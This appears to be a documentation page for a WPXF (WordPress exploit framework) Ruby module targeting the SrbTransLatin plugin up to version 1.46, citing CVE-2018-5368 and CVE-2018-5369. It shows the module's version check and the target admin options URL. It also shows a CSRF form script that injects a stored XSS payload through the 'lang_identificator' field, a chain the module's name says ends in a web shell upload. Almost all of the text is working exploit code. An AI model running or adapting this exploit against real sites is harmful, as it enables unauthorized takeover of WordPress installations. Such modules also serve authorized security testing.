class Wpxf::Exploit::SrbtranslatinCsrfXssShellUpload

Public Class Methods

new() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/srbtranslatin_csrf_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'SrbTransLatin <= 1.46 CSRF Stored XSS Shell Upload',
    author: [
      'd4wner',   # Disclosure
      'rastating' # WPXF module
    ],
    references: [
      ['CVE', '2018-5368'],
      ['CVE', '2018-5369'],
      ['WPVDB', '9004']
    ],
    date: 'Jan 11 2018'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/srbtranslatin_csrf_xss_shell_upload.rb, line 24
def check
  check_plugin_version_from_changelog('srbtranslatin', 'readme.txt', '1.47')
end
initial_script() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/srbtranslatin_csrf_xss_shell_upload.rb, line 32
def initial_script
  create_basic_post_script(
    vulnerable_url,
    'lang_identificator' => "script\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>",
    'stl_default_language' => 'cir',
    'file_lang_delimiter' => '=',
    'sanitize_file_names' => 'on',
    'Submit' => 'Update Options'
  )
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/srbtranslatin_csrf_xss_shell_upload.rb, line 28
def vulnerable_url
  "#{normalize_uri(wordpress_url_admin, 'options-general.php')}?page=srbtranslatoptions"
end